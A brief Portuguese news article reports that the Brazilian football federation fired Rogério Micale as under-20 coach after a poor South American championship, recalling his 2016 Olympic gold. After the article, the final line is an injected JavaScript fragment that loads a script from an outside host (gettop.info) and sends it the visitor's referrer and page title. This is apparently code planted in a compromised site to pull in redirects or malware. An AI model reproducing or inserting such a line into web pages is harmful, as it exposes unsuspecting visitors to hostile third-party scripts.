Rogério Micale não é mais técnico da Seleção Brasileira sub-20. A CBF decidiu demitir o treinador que conquistou o ouro inédito nas Olimpíadas do Rio de 2016, mas fracassou no Sul-Americano sub-20, que classificou quatro países para o Mundial 2017 da categoria (Equador, Uruguai, Argentina e Venezuela). O Brasil ficou na quinta colocação.
Micale assumiu a Seleção em maio de 2015, após uma má campanha também no Sul-Americano sub-20. Naquele ano, foi vice-campeão no Mundial, disputado na Suécia.
Em 2016, o treinador se tornou campeão olímpico. Com Neymar, Gabriel Jesus e Gabigol, conseguiu levar o Brasil à final contra Alemanha. Decidida nos pênaltis, o grupo obteve o único título que faltava ao futebol masculino brasileiro.
A escolha de um novo técnico pode ter a participação direta do coordenador de seleções, Edu Gaspar, e do comandante da Seleção principal, Tite.
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;